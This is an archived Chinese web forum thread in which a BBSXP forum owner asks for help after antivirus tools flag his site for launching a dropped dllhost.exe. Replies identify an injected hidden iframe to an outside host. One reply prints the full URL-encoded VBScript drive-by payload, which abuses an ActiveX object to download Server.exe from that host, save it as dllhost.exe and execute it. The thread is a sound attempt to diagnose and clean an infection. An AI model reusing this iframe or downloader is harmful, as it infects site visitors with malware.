BBSXP 2008 BBSXP 2008 SP2 ACCESS 8.0.5.081208 已经有打过补丁的

租用的500M虚拟空间，这两天网友访问 说论坛有木马 我访问的时候也出现了 这个问题……

访问也有提示了 microsoft.xmlhttp的漏洞 请问该查询哪个文件程序？ 来查看是否被植入代码？

IE 7打开页面后提示：360检测此网站时发现了什么问题？

第一次发现威胁日期是 2009-05-09 09:58:53。

最后一次在此网站中发现可疑内容的日期是 2009-05-09 08:58:19。

360云安全中心发现该网页含有会产生：

非法启动进程："C:\DOCUME~1\ol\LOCALS~1\Temp\dllhost.exe"

"C:\DOCUME~1\ol\LOCALS~1\Temp\dllhost.exe"

"C:\DOCUME~1\ol\LOCALS~1\Temp\dllhost.exe"

请高手帮忙解决一下 万分感谢……






用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

空间的网址是什么

网址是www.PDAQQ.com/bbsxp （访问论坛才会 访问主页不会出现问题）

干掉该段代码

<iframe src=http://8878.nznz.net/1.htm width=0 height=0></iframe>

谢谢 高手指点 请问在那个文件干掉这个代码？？是数据库里？还是论坛的程序内？

如果是程序有好多 ASP的 是一个一个找吗？万分感谢

请问这个程序代码是如何添加到网站的？？我看了后台 只有我一个人在上传东西啊

漏洞么

楼主可以使用附件干掉那段代码（有风险，建议先备份相关数据）

附件: 网页感染清除精灵1.1.rar (2009-5-9 16:58:30, 453.58 K)
该附件被下载次数 160

⊙﹏⊙b汗
现在的木马啊。。。。
<SCRIPT>varWords="%3Chtml%3E%0D%0A%3Ctitle%3E火狐网页木马VIP联系QQ%3A5798592%3C%2Ftitle%3E%0D%0A%3Cscriptlanguage%3D%22VBScript%22%3E%0D%0Aonerrorresumenext%0D%0AKz1%3D%22o%22%26%22bj%22%26%22ec%22%26%22t%22%0D%0AKz2%3D%22c%22%26%22la%22%26%22s%22%26%22si%22%26%22d%22%0D%0AaKz%3D%22C%22%26%225%22%26%225%22%26%226%22%26%22%2D%22%26%226%22%26%225%22%26%22A%22%26%223%22%26%22%2D%22%0D%0AxKz%3D%22c%22%26%22l%22%26%22si%22%26%22d%22%26%22%3A%22%26%22B%22%26%22D9%22%26%226%22%0D%0AKz3%3DxKz%26aKz%26%221%22%26%221%22%26%22D%22%26%220%22%26%22%2D%22%26%229%22%26%228%22%26%223%22%26%22A%22%26%22%2D%22%26%220%22%26%220%22%26%22C%22%26%220%22%26%224%22%26%22F%22%26%22C%22%26%222%22%26%229%22%26%22E%22%26%223%22%26%226%22%0D%0AKz4%3D%22M%22%26%22ic%22%26%22ro%22%26%22so%22%26%22ft%22%26%22%2EX%22%26%22M%22%26%22L%22%26%22HT%22%26%22T%22%26%22P%22%0D%0AKz5%3D%22Shell%2EApplication%22%0D%0AKz6%3D%22Sc%22%26%22ri%22%26%22p%22%26%22ti%22%26%22n%22%26%22g%2EFi%22%26%22l%22%26%22eSys%22%26%22tem%22%26%22Ob%22%26%22je%22%26%22ct%22%0D%0ASetHuohUc%3Ddocument%2EcreateElement%28Kz1%29%0D%0AHuohU%3D%22http%3A%2F%2F8878%2Enznz%2Enet%2FServer%2Eexe%22%0D%0Asubusicecod%28Kz5%2CXhU9%29%0D%0AsetHuohUeE%3DHuohUc%2Ecreateobject%28Kz5%2C%22%22%29%0D%0AHuohUeE%2EshEllExEcutEHuohU9%2C%22%22%2C%22%22%2C%22o%22%26%22p%22%26%22e%22%26%22n%22%2C0%0D%0Aendsub%0D%0AHuohUc%2EsetAttributeKz2%2CKz3%0D%0AHuohUi%3DKz4%0D%0ASetDHuohU%3DHuohUc%2ECreateObject%28HuohUi%2C%22%22%29%0D%0Awpa%3D%22A%22%26%22d%22%26%22o%22%26%22d%22%26%22b%22%26%22%2E%22%0D%0Awpc%3D%22S%22%26%22t%22%26%22r%22%0D%0Awpd%3D%22e%22%26%22a%22%26%22m%22%0D%0AHuohUf%3Dwpa%26wpc%26wpd%0D%0AHuohUg%3DHuohUf%0D%0AsetHuohUa%3DHuohUc%2Ecreateobject%28HuohUg%2C%22%22%29%0D%0AHuohUa%2Etype%3D1%0D%0AHuohUh%3D%22G%22%26%22E%22%26%22T%22%0D%0ADHuohU%2EOpenHuohUh%2CHuohU%2CFalse%0D%0ADHuohU%2ESend%0D%0AHuohU9%3D%22dllhost%2Eexe%22%0D%0ASeTHuohUb%3DHuohUc%2Ecreateobject%28Kz6%2C%22%22%29%0D%0AsETHuohUeE%3DHuohUb%2EGetSpecialFolder%282%29%0D%0AHuohUa%2Eopen%0D%0AHuohU9%3DHuohUb%2EBuildPath%28HuohUeE%2CHuohU9%29%0D%0AHuohUa%2EwriteDHuohU%2EresponseBody%0D%0AHuohUa%2EsavetofileHuohU9%2C2%0D%0AHuohUa%2Eclose%0D%0Avip%3DQQ5798592%0D%0Acallusicecod%28Kz5%2CXhU9%29%0D%0A%3C%2Fscript%3E%0D%0A%3C%2Fhtml%3E%0D%0A%3Cscriptlangauge%3D%22javasript%22%3Edocument%2Eoncontextmenu%3DnewFunction%28%27event%2EreturnValue%3Dfalse%3B%27%29%3Bdocument%2Eonselectstart%3DnewFunction%28%27event%2EreturnValue%3Dfalse%3B%27%29%3B%3C%2Fscript%3E%3Cscripttype%3D%22text%2Fjscript%22%3Efunctioninit%28%29%7Bdocument%2Ewrite%28%22网页正在载入%2E%2E%2E请稍等%2E%2E%2E%22%29%3B%7Dwindow%2Eonload%3Dinit%3B%3C%2Fscript%3E%0D%0A";document.write(unescape(Words))</SCRIPT>

汗一个
啥软件查看的
神器？

看的发晕了 啥来的？？

就看6楼